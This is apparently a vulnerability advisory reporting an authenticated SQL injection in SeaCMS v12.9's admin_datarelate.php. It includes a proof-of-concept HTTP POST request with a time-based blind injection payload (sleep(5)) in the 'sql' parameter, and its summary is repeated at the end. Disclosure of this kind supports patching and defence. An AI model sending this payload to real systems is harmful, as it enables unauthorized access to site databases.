Summary
SeaCMS v12.9 has an authenticated SQL injection vulnerability in the {random}/admin_datarelate.php file, where user provided data is directly used for SQL queries without proper cleaning
Proof of Concept (PoC)
POST /{random_path}/admin_datarelate.php?action=result HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
sql=(select 1 from (select(sleep(5)))x)
Summary SeaCMS v12.9 has an authenticated SQL injection vulnerability in the {random}/admin_datarelate.php file, where user provided data is directly used for SQL queries without proper cleaning
Proof of Concept (PoC)